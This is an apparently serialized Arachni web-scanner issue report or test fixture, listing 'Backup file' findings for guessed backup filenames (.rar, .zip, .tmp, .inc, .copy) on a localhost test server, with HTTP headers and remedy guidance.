description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.rar
injected: some_filename.php.rar
id: some_filename.php.rar
elem: path
remarks: {}
method: ''
response: some_filename.php.rar
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.rar
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.rar
injected: some_filename.rar
id: some_filename.rar
elem: path
remarks: {}
method: ''
response: some_filename.rar
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: true
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.src
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.src
injected: some_filename.php.src
id: some_filename.php.src
elem: path
remarks: {}
method: ''
response: some_filename.php.src
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.src
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.src
injected: some_filename.src
id: some_filename.src
elem: path
remarks: {}
method: ''
response: some_filename.src
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.tmp
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.tmp
injected: some_filename.php.tmp
id: some_filename.php.tmp
elem: path
remarks: {}
method: ''
response: some_filename.php.tmp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.zip
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.zip
injected: some_filename.php.zip
id: some_filename.php.zip
elem: path
remarks: {}
method: ''
response: some_filename.php.zip
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.zip
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.zip
injected: some_filename.zip
id: some_filename.zip
elem: path
remarks: {}
method: ''
response: some_filename.zip
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.inc
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.inc
injected: some_filename.php.inc
id: some_filename.php.inc
elem: path
remarks: {}
method: ''
response: some_filename.php.inc
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: true
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.tmp
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.tmp
injected: some_filename.tmp
id: some_filename.tmp
elem: path
remarks: {}
method: ''
response: some_filename.tmp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.inc
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.inc
injected: some_filename.inc
id: some_filename.inc
elem: path
remarks: {}
method: ''
response: some_filename.inc
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.copy
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.copy
injected: some_filename.php.copy
id: some_filename.php.copy
elem: path
remarks: {}
method: ''
response: some_filename.php.copy
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.copy
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.copy
injected: some_filename.copy
id: some_filename.copy
elem: path
remarks: {}
method: ''
response: some_filename.copy
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/Copy%20of%20some_filename.php
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
